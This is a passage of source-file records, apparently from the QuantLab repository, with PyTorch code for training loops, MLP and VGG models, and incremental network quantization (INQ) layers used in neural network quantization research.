create/retrieve experiment logbook\n logbook = Logbook(problem, topology, exp_id, load)\n\n # create/retrieve network and treatment\n net, net_maybe_par, device, loss_fn = get_topo(logbook)\n thr, opt, lr_sched = get_algo(logbook, net)\n train_l, valid_l, test_l = get_data(logbook, num_workers=num_workers)\n\n if use_single_gpu:\n net_maybe_par = net\n\n # run experiment\n if mode == 'train':\n for _ in range(logbook.i_epoch + 1, logbook.config['treat']['max_epoch'] + 1):\n\n logbook.start_epoch()\n thr.step()\n\n #prepare training network\n net.train()\n for ctrlr in indiv.Controller.getControllers(net):\n # call controllers for e.g. LR, annealing, ... 
adjustments\n ctrlr.step_preTraining(logbook.i_epoch, opt, tensorboardWriter=logbook.writer)\n\n # validate pre-training network\n validPreTrain_stats = {}\n if do_validPreTrain:\n validPreTrain_stats = test(logbook, net, device, loss_fn, valid_l, valid=True, prefix='validPreTrain')\n\n # train\n train_stats = train(logbook, net_maybe_par, device, loss_fn, opt, train_l)\n\n # prepare validation network\n net.eval()\n for ctrlr in indiv.Controller.getControllers(net):\n ctrlr.step_preValidation(logbook.i_epoch, tensorboardWriter=logbook.writer)\n\n #validate (re-)trained network\n valid_stats = test(logbook, net, device, loss_fn, valid_l, valid=True)\n stats = {**train_stats, **valid_stats, **validPreTrain_stats}\n\n # update learning rate\n if 'metrics' in lr_sched.step.__code__.co_varnames:\n lr_sched_metric = stats[logbook.config['treat']['lr_scheduler']['step_metric']]\n lr_sched.step(lr_sched_metric)\n else:\n lr_sched.step()\n\n # save model if update metric has improved...\n if logbook.is_better(stats):\n ckpt = {'indiv': {'net': net.state_dict()},\n 'treat': {\n 'thermostat': thr.state_dict(),\n 'optimizer': opt.state_dict(),\n 'lr_scheduler': lr_sched.state_dict(),\n 'i_epoch': logbook.i_epoch\n },\n 'protocol': {'metrics': logbook.metrics}}\n logbook.store_checkpoint(ckpt, is_best=True)\n\n # ...and/or if checkpoint epoch\n is_ckpt_epoch = (logbook.i_epoch % int(ckpt_every)) == 0\n if is_ckpt_epoch:\n ckpt = {'indiv': {'net': net.state_dict()},\n 'treat': {\n 'thermostat': thr.state_dict(),\n 'optimizer': opt.state_dict(),\n 'lr_scheduler': lr_sched.state_dict(),\n 'i_epoch': logbook.i_epoch\n },\n 'protocol': {'metrics': logbook.metrics}}\n logbook.store_checkpoint(ckpt)\n\n # return the last validation stats\n return train_stats, valid_stats\n\n elif mode == 'test':\n # test\n net.eval()\n test_stats = test(logbook, net, device, loss_fn, test_l)\n return test_stats\n\n\nif __name__ == \"__main__\":\n # Command Line Interface\n parser = argparse.ArgumentParser(description='QuantLab')\n parser.add_argument('--problem', help='MNIST/CIFAR-10/ImageNet/COCO')\n parser.add_argument('--topology', help='Network topology')\n parser.add_argument('--exp_id', help='Experiment to launch/resume', default=None)\n parser.add_argument('--load', help='Checkpoint to load: best/last/i_epoch', default='best')\n parser.add_argument('--mode', help='Experiment mode: train/test', default='train')\n parser.add_argument('--ckpt_every', help='Frequency of checkpoints (in epochs)', default=10, type=int)\n parser.add_argument('--num_workers', help='Number of workers for DataLoader', default=10, type=int)\n parser.add_argument('--skip_validPreTrain', help='Skip validation before training', action='store_true')\n parser.add_argument('--use_single_gpu', help='Use a single GPU', action='store_true')\n args = parser.parse_args()\n\n main(args.problem, args.topology, args.exp_id, args.load, args.mode, args.ckpt_every,\n args.num_workers, not args.skip_validPreTrain, args.use_single_gpu)\n" }, { "alpha_fraction": 0.527804434299469, "alphanum_fraction": 0.554650068283081, "avg_line_length": 29.676469802856445, "blob_id": "a0deea5e44678a7eabbd8db710b55d9ffdb69f7e", "content_id": "b42af71ac96cbeb794eb4ae7ffe993900190f774", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2086, "license_type": "permissive", "max_line_length": 76, "num_lines": 68, "path": "/quantlab/MNIST/MLP/mlpbaseline.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", 
"text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n\nimport torch.nn as nn\n\n\n# In order for the baselines to be launched with the same logic as quantized\n# models, an empty quantization scheme and an empty thermostat schedule need\n# to be configured.\n# Use the following templates for the `net` and `thermostat` configurations:\n#\n# \"net\": {\n# \"class\": \"MLPBaseline\",\n# \"params\": {\"capacity\": 1},\n# \"pretrained\": null,\n# \"loss_function\": {\n# \"class\": \"HingeLoss\",\n# \"params\": {\"num_classes\": 10}\n# }\n# }\n#\n# \"thermostat\": {\n# \"class\": \"MLPBaseline\",\n# \"params\": {\n# \"noise_schemes\": {},\n# \"bindings\": []\n# }\n# }\n\nclass MLPBaseline(nn.Module):\n \"\"\"Multi-Layer Perceptron.\"\"\"\n def __init__(self, capacity):\n super(MLPBaseline, self).__init__()\n nh = int(2048 * capacity)\n self.phi1_fc = nn.Linear(28 * 28, nh, bias=False)\n self.phi1_bn = nn.BatchNorm1d(nh)\n self.phi1_act = nn.ReLU6()\n self.phi2_fc = nn.Linear(nh, nh, bias=False)\n self.phi2_bn = nn.BatchNorm1d(nh)\n self.phi2_act = nn.ReLU6()\n self.phi3_fc = nn.Linear(nh, nh, bias=False)\n self.phi3_bn = nn.BatchNorm1d(nh)\n self.phi3_act = nn.ReLU6()\n self.phi4_fc = nn.Linear(nh, 10)\n\n def forward(self, x, withStats=False):\n x = x.view(-1, 28 * 28)\n x = self.phi1_fc(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_fc(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_fc(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_fc(x)\n if withStats:\n stats = []\n stats.append(('phi1_fc_w', self.phi1_fc.weight.data))\n stats.append(('phi2_fc_w', self.phi2_fc.weight.data))\n stats.append(('phi3_fc_w', self.phi3_fc.weight.data))\n stats.append(('phi4_fc_w', self.phi4_fc.weight.data))\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n" }, { "alpha_fraction": 0.8373494148254395, "alphanum_fraction": 0.8373494148254395, "avg_line_length": 32.20000076293945, "blob_id": "1aefc90b7f336437535d524162a2728977a509f8", "content_id": "73a00d0a8be4884bbdcc7344ef64a2bf1deca913", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 166, "license_type": "permissive", "max_line_length": 55, "num_lines": 5, "path": "/quantlab/BCI-CompIV-2a/EEGNet/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "from .preprocess import load_data_sets\nfrom .postprocess import postprocess_pr, postprocess_gt\n\nfrom .eegnet import EEGNet\nfrom .eegnetbaseline import EEGNetBaseline\n" }, { "alpha_fraction": 0.4913890063762665, "alphanum_fraction": 0.5202171206474304, "avg_line_length": 42.060482025146484, "blob_id": "16ca48656ad55fa38e4b888a80fe02ba127b853e", "content_id": "a54cce7c3c2638d649bd13b839581979b37e3881", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10684, "license_type": "permissive", "max_line_length": 98, "num_lines": 248, "path": "/quantlab/CIFAR-10/VGG/vgg.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport torch.nn as nn\n\nfrom quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\nfrom quantlab.indiv.ste_ops import STEActivation\n\nclass 
VGG(nn.Module):\n \"\"\"Quantizable VGG.\"\"\"\n def __init__(self, capacity=1, quant_schemes=None, \n quantAct=True, quantActSTENumLevels=None, quantWeights=True, \n weightInqSchedule=None, weightInqBits=None, weightInqLevels=None, \n weightInqStrategy=\"magnitude\", \n quantSkipFirstLayer=False, quantSkipLastLayer=False, \n stepEveryEpoch=False, weightInit=None, \n rescaleWeights=False, variant=None, weightInqQuantInit=None):\n \n super().__init__()\n \n assert(weightInqBits == None or weightInqLevels == None)\n if weightInqBits != None:\n print('warning: weightInqBits deprecated')\n if weightInqBits == 1:\n weightInqLevels = 2\n elif weightInqBits >= 2:\n weightInqLevels = 2**weightInqBits\n else:\n assert(False)\n \n def activ(name, nc):\n if quantAct:\n if quantActSTENumLevels != None and quantActSTENumLevels > 0: \n return STEActivation(startEpoch=0, \n numLevels=quantActSTENumLevels)\n else:\n return StochasticActivation(*quant_schemes[name], nc)\n else: \n assert(quantActSTENumLevels == None or quantActSTENumLevels <= 0)\n return nn.ReLU(inplace=True)\n \n def conv2d(name, ni, no, kernel_size=3, stride=1, padding=1, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticConv2d(*quant_schemes[name], ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n else:\n return INQConv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias, \n numLevels=weightInqLevels, \n strategy=weightInqStrategy, \n quantInitMethod=weightInqQuantInit)\n else: \n return nn.Conv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n \n def linear(name, ni, no, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticLinear(*quant_schemes[name], ni, no, bias=bias)\n else:\n return INQLinear(ni, no, bias=bias, \n numLevels=weightInqLevels, \n strategy=weightInqStrategy, \n quantInitMethod=weightInqQuantInit)\n else: \n return nn.Linear(ni, no, bias=bias)\n \n c0 = 3\n c1 = int(128 * capacity)\n c2 = int(256 * capacity)\n c3 = int(512 * capacity)\n nh = 1024\n \n # convolutional layers\n if quantSkipFirstLayer:\n self.phi1_conv = nn.Conv2d(c0, c1, kernel_size=3, padding=1, bias=False)\n else:\n self.phi1_conv = conv2d('phi1_conv', c0, c1)\n self.phi1_bn = nn.BatchNorm2d(c1)\n self.phi1_act = activ('phi1_act', c1)\n self.phi2_conv = conv2d('phi2_conv', c1, c1)\n self.phi2_mp = nn.MaxPool2d(kernel_size=2, stride=2)\n self.phi2_bn = nn.BatchNorm2d(c1)\n self.phi2_act = activ('phi2_act', c1)\n self.phi3_conv = conv2d('phi3_conv', c1, c2)\n self.phi3_bn = nn.BatchNorm2d(c2)\n self.phi3_act = activ('phi3_act', c2)\n self.phi4_conv = conv2d('phi4_conv', c2, c2)\n self.phi4_mp = nn.MaxPool2d(kernel_size=2, stride=2)\n self.phi4_bn = nn.BatchNorm2d(c2)\n self.phi4_act = activ('phi4_act', c2)\n self.phi5_conv = conv2d('phi5_conv', c2, c3)\n self.phi5_bn = nn.BatchNorm2d(c3)\n self.phi5_act = activ('phi5_act', c3)\n self.phi6_conv = conv2d('phi6_conv', c3, c3)\n self.phi6_mp = nn.MaxPool2d(kernel_size=2, stride=2)\n self.phi6_bn = nn.BatchNorm2d(c3)\n self.phi6_act = activ('phi6_act', c3)\n # dense layers\n if variant == None:\n self.phi7_fc = linear('phi7_fc', c3*4*4, nh)\n self.phi7_bn = nn.BatchNorm1d(nh)\n self.phi7_act = activ('phi7_act', nh)\n self.phi8_fc = linear('phi8_fc', nh, nh)\n self.phi8_bn = nn.BatchNorm1d(nh)\n self.phi8_act = activ('phi8_act', nh)\n if quantSkipLastLayer:\n self.phi9_fc = nn.Linear(nh, 10, bias=False)\n self.phi9_bn = nn.BatchNorm1d(10)\n else:\n 
self.phi9_fc = linear('phi9_fc', nh, 10)\n self.phi9_bn = nn.BatchNorm1d(10)\n elif variant == 'VGG-Small':\n assert(quantSkipLastLayer)\n self.phi7_fc = nn.Identity()\n self.phi7_bn = nn.Identity()\n self.phi7_act = nn.Identity()\n self.phi8_fc = nn.Identity()\n self.phi8_bn = nn.Identity()\n self.phi8_act = nn.Identity()\n self.phi9_fc = nn.Linear(c3*4*4, 10, bias=True)\n self.phi9_bn = nn.Identity()\n else:\n assert(False)\n \n \n \n # https://unify.id/wp-content/uploads/2018/03/weight_init_BNN.pdf\n def initWeightFunc(m):\n if (isinstance(m, nn.Conv2d) or \n isinstance(m, INQConv2d) or \n isinstance(m, StochasticConv2d)):\n w = m.weight.data\n #not initializing bias here...\n if weightInit == None:\n pass\n elif weightInit == \"He\": \n nn.init.kaiming_normal_(w, mode='fan_in', nonlinearity='relu')\n elif weightInit == \"orthogonal\":\n torch.nn.init.orthogonal_(w, gain=1) \n else:\n assert(False)\n \n self.apply(initWeightFunc)\n \n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule, \n clearOptimStateOnStep=True, \n stepEveryEpoch=stepEveryEpoch, \n rescaleWeights=rescaleWeights)\n\n def forward(self, x, withStats=False):\n x = self.phi1_conv(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_conv(x)\n x = self.phi2_mp(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_conv(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_conv(x)\n x = self.phi4_mp(x)\n x = self.phi4_bn(x)\n x = self.phi4_act(x)\n x = self.phi5_conv(x)\n x = self.phi5_bn(x)\n x = self.phi5_act(x)\n x = self.phi6_conv(x)\n x = self.phi6_mp(x)\n x = self.phi6_bn(x)\n x = self.phi6_act(x)\n# x = x.reshape(-1, torch.Tensor(list(x.size()[-3:])).to(torch.int32).prod().item())\n x = x.reshape(x.size(0), -1)\n x = self.phi7_fc(x)\n x = self.phi7_bn(x)\n x = self.phi7_act(x)\n x = self.phi8_fc(x)\n x = self.phi8_bn(x)\n x = self.phi8_act(x)\n x = self.phi9_fc(x)\n x = self.phi9_bn(x)\n if withStats:\n stats = []\n stats.append(('phi1_conv_w', self.phi1_conv.weight.data))\n stats.append(('phi3_conv_w', self.phi3_conv.weight.data))\n stats.append(('phi5_conv_w', self.phi5_conv.weight.data))\n# stats.append(('phi7_fc_w', self.phi7_fc.weight.data))\n# stats.append(('phi8_fc_w', self.phi8_fc.weight.data))\n# stats.append(('phi9_fc_w', self.phi9_fc.weight.data))\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n \n# LOAD NETWORK\nif __name__ == '__main__':\n model = VGG(quantAct=False, quantWeights=True, \n weightInqSchedule={'1': 1.0}, quantSkipFirstLayer=True)\n# path = '../../../CIFAR-10/logs/exp048/saves/epoch1050.ckpt'\n# path = '../../../CIFAR-10/logs/exp057/saves/epoch0900.ckpt'\n# path = '../../../CIFAR-10/logs/exp066/saves/epoch1150.ckpt'\n# path = '../../../CIFAR-10/logs/exp069/saves/epoch0100.ckpt'\n# path = '../../../CIFAR-10/logs/exp308/saves/best.ckpt' # TWN with rescaling\n# path = '../../../CIFAR-10/logs/exp071/saves/best.ckpt' # TWN slow latest\n# path = '../../../CIFAR-10/logs/exp273/saves/best.ckpt' # TWN fast latest\n path = '../../../CIFAR-10/logs/exp032/saves/best.ckpt' # TNN\n# path = '../../../CIFAR-10/logs/exp293/saves/best.ckpt' # BNN\n state_dicts = torch.load(path, map_location='cpu')\n model.load_state_dict(state_dicts['indiv']['net'])\n print('non-quant values, layer 3: %8d' % (\n torch.isnan(model.phi3_conv.weightFrozen).sum(dtype=torch.long).item()))\n print('total values, layer 3: %8d' % 
(model.phi3_conv.weightFrozen.numel()))\n \n \n import matplotlib.pyplot as plt\n plt.hist(model.phi3_conv.weightFrozen.flatten(), \n bins=201)\n plt.hist(model.phi3_conv.weight.detach().flatten(), \n bins=201)\n \n \n #########################################################\n # verification: no information in non-quantized weights\n #########################################################\n verification = False\n if verification:\n quantModules = INQController.getInqModules(model)\n \n #check proper quantization levels\n from matplotlib import pyplot as plt\n plt.hist(quantModules[4].weightFrozen.detach().flatten().numpy(), bins=30)\n \n #remove non-quantized information for test run\n for m in quantModules:\n m.weight.data.zero_()\n state_dicts['indiv']['net'] = model.state_dict()\n torch.save(state_dicts, path.replace('.ckpt', '_verify.ckpt'))\n \n" }, { "alpha_fraction": 0.5296861529350281, "alphanum_fraction": 0.5388818383216858, "avg_line_length": 40.44198989868164, "blob_id": "465b4e60856334180f5ef3a4acc53600588323fd", "content_id": "355265a1ec92a3f7000ea7890a951b5e4905e3b1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15007, "license_type": "permissive", "max_line_length": 128, "num_lines": 362, "path": "/quantlab/indiv/inq_ops.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport math\nimport itertools\nimport torch \nimport torch.nn as nn\nimport quantlab.indiv as indiv\n\nclass INQController(indiv.Controller):\n \"\"\"Instantiate typically once per network, provide it with a list of INQ \n modules to control and a INQ schedule, and insert a call to the step \n function once per epoch. \"\"\"\n def __init__(self, modules, schedule, clearOptimStateOnStep=False, \n stepEveryEpoch=False, rescaleWeights=False):\n super().__init__()\n self.modules = modules\n schedule = {int(k): v for k, v in schedule.items()} #parse string keys to ints\n self.schedule = schedule # dictionary mapping epoch to fraction\n self.clearOptimStateOnStep = clearOptimStateOnStep\n self.fraction = 0.0\n self.stepEveryEpoch = stepEveryEpoch\n self.rescaleWeights = rescaleWeights\n \n def step_preTraining(self, epoch, optimizer=None, tensorboardWriter=None):\n \n if epoch in self.schedule.keys():\n self.fraction = self.schedule[epoch]\n elif self.stepEveryEpoch:\n pass\n else:\n return\n \n #log to tensorboard\n if tensorboardWriter != None:\n tensorboardWriter.add_scalar('INQ/fraction', \n self.fraction, global_step=epoch)\n \n #step each INQ module\n for m in self.modules: \n m.step(self.fraction)\n\n #clear optimizer state (e.g. Adam's momentum)\n if self.clearOptimStateOnStep and optimizer != None:\n optimizer.state.clear()\n \n def step_postOptimStep(self, *args, **kwargs):\n if self.rescaleWeights:\n for m in self.modules:\n m.weightInqCtrl.rescaleWeights()\n \n @staticmethod\n def getInqModules(net):\n return [m \n for m in net.modules() \n if (isinstance(m, INQLinear) or isinstance(m, INQConv1d) or \n isinstance(m, INQConv2d))]\n\n \nclass INQParameterController:\n \"\"\"Used to implement INQ functionality within a custom layer (e.g. INQConv2d).\n Creates and register all relevant fields and parameters in the module. 
\"\"\"\n def __init__(self, module, parameterName, numLevels=3, \n strategy=\"magnitude\", backCompat=True, \n quantInitMethod=None):#'uniform-l1opt'\n \n self.module = module\n self.parameterName = parameterName\n self.backCompat = backCompat\n \n self.numLevels = numLevels\n self.strategy = strategy # \"magnitude\" or \"random\" or \"magnitude-SRQ\"/\"RPR\"\n self.fraction = 0.0\n self.quantInitMethod = quantInitMethod\n \n if self.backCompat:\n assert(parameterName == 'weight')\n assert(not hasattr(module, 'weightFrozen'))\n assert(not hasattr(module, 'sParam'))\n self.pnameFrozen = 'weightFrozen'\n self.pnameS = 'sParam'\n else:\n #more structured; adds support for multiple indep. INQ parameters\n self.pnameFrozen = parameterName + '_inqFrozen'\n self.pnameS = parameterName + '_inqS'\n \n module.__setattr__(self.pnameFrozen, \n nn.Parameter(torch.full_like(self.weight, float('NaN')), \n requires_grad=False))\n module.__setattr__(self.pnameS, \n nn.Parameter(torch.full((1,), float('NaN')).to(self.weight), \n requires_grad=False))\n \n def getWeightParams(self, module):\n weight = module.__getattr__(self.parameterName)\n weightFrozen = module.__getattr__(self.pnameFrozen)\n return weight, weightFrozen\n \n @property\n def weight(self):\n return self.module.__getattr__(self.parameterName)\n \n @property\n def weightFrozen(self):\n return self.module.__getattr__(self.pnameFrozen)\n \n @property\n def sParam(self):\n return self.module.__getattr__(self.pnameS)\n \n @property\n def s(self):\n return self.sParam.item()\n @s.setter\n def s(self, value):\n self.sParam[0] = value\n \n @staticmethod\n def inqQuantize(weight, quantLevels):\n \"\"\"Quantize a single weight using the INQ quantization scheme.\"\"\"\n \n bestQuantLevel = torch.zeros_like(weight)\n minQuantError = torch.full_like(weight, float('inf'))\n \n for ql in quantLevels:\n qerr = (weight-ql).abs()\n mask = qerr < minQuantError\n bestQuantLevel[mask] = ql\n minQuantError[mask] = qerr[mask]\n \n quantizedWeight = bestQuantLevel\n return quantizedWeight\n \n def inqStep(self, fraction):\n \n \n if self.quantInitMethod == None:\n #update s\n if self.fraction == 0.0 and math.isnan(self.s):\n self.s = torch.max(torch.abs(self.weight.data)).item()\n \n #compute quantization levels\n n_1 = math.floor(math.log((4*self.s)/3, 2))\n n_2 = int(n_1 + 2 - (self.numLevels // 2))\n if self.numLevels >= 3:\n quantLevelsPos = (2**i for i in range(n_2, n_1+1))\n quantLevelsNeg = (-2**i for i in range(n_2, n_1+1))\n quantLevels = itertools.chain(quantLevelsPos, [0], quantLevelsNeg)\n else: \n assert(self.numLevels == 2)\n quantLevels = [self.s/2, -self.s/2]#[2**n_2, -2**n_2]\n \n elif self.quantInitMethod == 'uniform':\n # update s\n if self.fraction == 0.0 and math.isnan(self.s):\n self.s = torch.max(torch.abs(self.weight.data)).item()\n\n #compute quantization levels\n quantLevels = torch.linspace(-self.s, self.s, steps=self.numLevels)\n\n elif self.quantInitMethod in ['uniform-l1opt', \n 'uniform-l2opt', \n 'uniform-perCh-l2opt', \n 'uniform-linfopt']:\n getQLs = lambda s: torch.linspace(-s, s, steps=self.numLevels)\n if self.fraction == 0.0 and math.isnan(self.s):\n import scipy.optimize\n def optimWeight(weight):\n def loss(s):\n s = s.item()\n qls = getQLs(s)\n for i, ql in enumerate(qls):\n tmp = (weight-ql).abs()\n if i == 0:\n minQuantErr = tmp\n else:\n minQuantErr = torch.min(minQuantErr, tmp)\n if self.quantInitMethod == 'uniform-l1opt':\n return minQuantErr.norm(p=1).item()\n elif self.quantInitMethod in ['uniform-l2opt', 
'uniform-perCh-l2opt']:\n return minQuantErr.norm(p=2).item()\n elif self.quantInitMethod == 'uniform-linfopt':\n return minQuantErr.norm(p=float('inf')).item()\n else:\n assert(False)\n bounds = (1e-6, weight.abs().max().item())\n optRes = scipy.optimize.brute(loss, ranges=(bounds,), \n Ns=1000, disp=True, \n finish=scipy.optimize.fmin)\n s = optRes[0]\n weight.mul_(1/s)\n s = 1 \n return s\n \n if self.quantInitMethod in ['uniform-l1opt', \n 'uniform-l2opt', \n 'uniform-linfopt']:\n self.s = optimWeight(self.weight.data.flatten().detach())\n elif self.quantInitMethod in ['uniform-perCh-l2opt']:\n self.s = 1\n for c in range(self.weight.size(0)):\n optimWeight(self.weight.data[c].flatten().detach())\n quantLevels = getQLs(self.s)\n else:\n assert(False)\n self.fraction = fraction\n\n if self.strategy == \"magnitude-SRQ\" or self.strategy == \"RPR\":\n if self.fraction == None:\n return\n \n #get current weights quantized\n self.weightFrozen.data.copy_(self.inqQuantize(self.weight.data, quantLevels))\n numUnFreeze = int((1-self.fraction)*self.weight.numel())\n idxsUnFreeze = torch.randperm(self.weight.numel())[:numUnFreeze]\n self.weightFrozen.data.flatten()[idxsUnFreeze] = float('NaN')\n \n else:\n #get number of weights to quantize\n prevCount = self.weightFrozen.numel() - torch.isnan(self.weightFrozen.data).sum(dtype=torch.long).item()\n newCount = int(self.fraction*self.weightFrozen.numel())\n \n #find indexes of weights to quant\n if self.strategy == \"magnitude\":\n self.weight.data[~torch.isnan(self.weightFrozen.data)].fill_(0)\n _, idxsSorted = self.weight.data.flatten().abs().sort(descending=True)\n elif self.strategy == \"random\":\n idxsSorted = torch.randperm(self.weight.numel())\n else:\n assert(False)\n idxsFreeze = idxsSorted[:newCount-prevCount]\n \n #quantize the weights at these indexes\n self.weightFrozen.data.flatten()[idxsFreeze] = self.inqQuantize(self.weight.data.flatten()[idxsFreeze], quantLevels)\n \n def inqAssembleWeight(self, module=None):\n \n #with nn.DataParallel, the module is copied, so self.module cannot be used\n weight, weightFrozen = self.getWeightParams(module)\n \n weightFrozen = weightFrozen.detach()\n frozen = ~torch.isnan(weightFrozen)\n weightAssembled = torch.zeros_like(weightFrozen)\n weightAssembled[frozen] = weightFrozen[frozen]\n fullPrecSelector = torch.isnan(weightFrozen).float()\n tmp = fullPrecSelector*weight\n weightAssembled = weightAssembled + tmp\n return weightAssembled\n \n def rescaleWeights(self):\n self.weight.data.mul_((self.s/2)/self.weight.data.abs().mean().item())\n\n\nclass INQLinear(nn.Linear):\n def __init__(self, in_features, out_features, bias=True, \n numLevels=3, strategy=\"magnitude\", quantInitMethod=None):\n \n super().__init__(in_features, out_features, bias)\n self.weightInqCtrl = INQParameterController(self, 'weight', \n numLevels, strategy,\n quantInitMethod=quantInitMethod)\n \n def step(self, fraction):\n self.weightInqCtrl.inqStep(fraction)\n\n def forward(self, input):\n weightAssembled = self.weightInqCtrl.inqAssembleWeight(self)\n return nn.functional.linear(input, weightAssembled, self.bias)\n \n \nclass INQConv1d(nn.Conv1d):\n def __init__(self, in_channels, out_channels, kernel_size, \n stride=1, padding=0, dilation=1, groups=1, \n bias=True, padding_mode='zeros', \n numLevels=3, strategy=\"magnitude\", quantInitMethod=None):\n \n super().__init__(in_channels, out_channels, kernel_size, \n stride, padding, dilation, groups, \n bias, padding_mode)\n \n self.weightInqCtrl = INQParameterController(self, 
'weight', \n numLevels, strategy,\n quantInitMethod=quantInitMethod)\n \n def step(self, fraction):\n self.weightInqCtrl.inqStep(fraction)\n\n def forward(self, input):\n weightAssembled = self.weightInqCtrl.inqAssembleWeight(self)\n \n if self.padding_mode == 'circular':\n expanded_padding = ((self.padding[0] + 1) // 2, self.padding[0] // 2)\n return nn.functional.conv1d(\n nn.functional.pad(input, expanded_padding, mode='circular'),\n weightAssembled, self.bias, self.stride,\n (0,), self.dilation, self.groups)\n return nn.functional.conv1d(input, weightAssembled, self.bias, self.stride,\n self.padding, self.dilation, self.groups)\n \n \nclass INQConv2d(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, \n stride=1, padding=0, dilation=1, groups=1, \n bias=True, padding_mode='zeros', \n numLevels=3, strategy=\"magnitude\", quantInitMethod=None):\n \n super().__init__(in_channels, out_channels, kernel_size, \n stride, padding, dilation, groups, \n bias, padding_mode)\n \n self.weightInqCtrl = INQParameterController(self, 'weight', \n numLevels, strategy,\n quantInitMethod=quantInitMethod)\n \n def step(self, fraction):\n self.weightInqCtrl.inqStep(fraction)\n\n def forward(self, input):\n weightAssembled = self.weightInqCtrl.inqAssembleWeight(self)\n \n if self.padding_mode == 'circular':\n expanded_padding = ((self.padding[1] + 1) // 2, self.padding[1] // 2,\n (self.padding[0] + 1) // 2, self.padding[0] // 2)\n return nn.functional.conv2d(nn.functional.pad(input, expanded_padding, mode='circular'),\n weightAssembled, self.bias, self.stride,\n (0,), self.dilation, self.groups)\n\n return nn.functional.conv2d(input, weightAssembled, self.bias, self.stride,\n self.padding, self.dilation, self.groups)\n\nif __name__ == '__main__':\n x = torch.linspace(-2,2,100)\n numLevels = 3\n s = torch.max(torch.abs(x)).item()\n \n n_1 = math.floor(math.log((4*s)/3, 2))\n n_2 = int(n_1 + 2 - (numLevels//2))\n quantLevelsPos = (2**i for i in range(n_2, n_1+1))\n quantLevelsNeg = (-2**i for i in range(n_2, n_1+1))\n quantLevels = itertools.chain(quantLevelsPos, [0], quantLevelsNeg)\n \n x_q = INQParameterController.inqQuantize(x, quantLevels)\n \n \n import matplotlib.pyplot as plt\n plt.clf()\n plt.plot(x.numpy())\n plt.plot(x_q.numpy())\n\n\n model = INQLinear(2, 3, bias=False, \n numLevels=numLevels, strategy=\"RPR\")\n\n print(model.weight)\n print(model.weightFrozen)\n model.step(0.5)\n print(model.weight)\n print(model.weightFrozen)\n \n x = torch.randn(4,2)\n y = model(x)\n L = y.norm(p=2)\n L.backward()\n \n" }, { "alpha_fraction": 0.5408163070678711, "alphanum_fraction": 0.545634925365448, "avg_line_length": 35.75, "blob_id": "8df17a6e4eb830f19ef6a4dceaef4b2aeaddcf1f", "content_id": "50459d059b6451e13e7e3528db4c850a6fdac807", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3528, "license_type": "permissive", "max_line_length": 116, "num_lines": 96, "path": "/quantlab/protocol/rooms.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nfrom progress.bar import FillingSquaresBar\nimport torch\nimport quantlab.indiv as indiv\n\ndef train(logbook, net, device, loss_fn, opt, train_l):\n \"\"\"Run one epoch of the training experiment.\"\"\"\n logbook.meter.reset()\n bar = FillingSquaresBar('Training \\t', max=len(train_l))\n controllers = indiv.Controller.getControllers(net)\n \n for i_batch, 
data in enumerate(train_l):\n \n # load data onto device\n inputs, gt_labels = data\n inputs = inputs.to(device)\n gt_labels = gt_labels.to(device)\n \n # forprop\n pr_outs = net(inputs)\n loss = loss_fn(pr_outs, gt_labels)\n \n # update statistics\n logbook.meter.update(pr_outs, gt_labels, loss.item(), track_metric=logbook.track_metric)\n bar.suffix = 'Total: {total:} | ETA: {eta:} | Epoch: {epoch:4d} | ({batch:5d}/{num_batches:5d})'.format(\n total=bar.elapsed_td,\n eta=bar.eta_td,\n epoch=logbook.i_epoch,\n batch=i_batch + 1,\n num_batches=len(train_l))\n bar.suffix = bar.suffix + logbook.meter.bar()\n bar.next()\n \n # backprop\n opt.zero_grad()\n loss.backward()\n opt.step()\n for ctrl in controllers: \n ctrl.step_postOptimStep()\n \n bar.finish()\n stats = {\n 'train_loss': logbook.meter.avg_loss,\n 'train_metric': logbook.meter.avg_metric\n }\n for k, v in stats.items():\n if v:\n logbook.writer.add_scalar(k, v, global_step=logbook.i_epoch)\n 